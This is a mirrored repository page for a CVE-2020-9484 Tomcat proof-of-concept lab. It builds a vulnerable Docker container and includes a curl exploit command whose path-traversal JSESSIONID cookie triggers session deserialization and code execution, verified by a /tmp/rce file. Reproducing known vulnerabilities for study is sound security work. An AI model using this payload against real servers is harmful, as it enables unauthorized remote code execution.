# CVE-2020-9484 **Repository Path**: chenvlqi/CVE-2020-9484 ## Basic Information - **Project Name**: CVE-2020-9484 - **Description**: No description available - **Primary Language**: Unknown - **License**: Not specified - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 0 - **Created**: 2020-06-01 - **Last Updated**: 2020-12-19 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README # CVE-2020-9484 (Tomcat) For educational purposes only. See Reference for the details. ## Run ``` $ git clone https://github.com/masahiro331/CVE-2020-9484.git $ cd CVE-2020-9484 $ docker build -t tomcat:groovy . $ docker run -d -p 8080:8080 tomcat:groovy ``` ## Exploit ``` $ curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' ``` ## Check ``` $ docker exec -it $CONTAINER /bin/sh $ ls /tmp/rce ```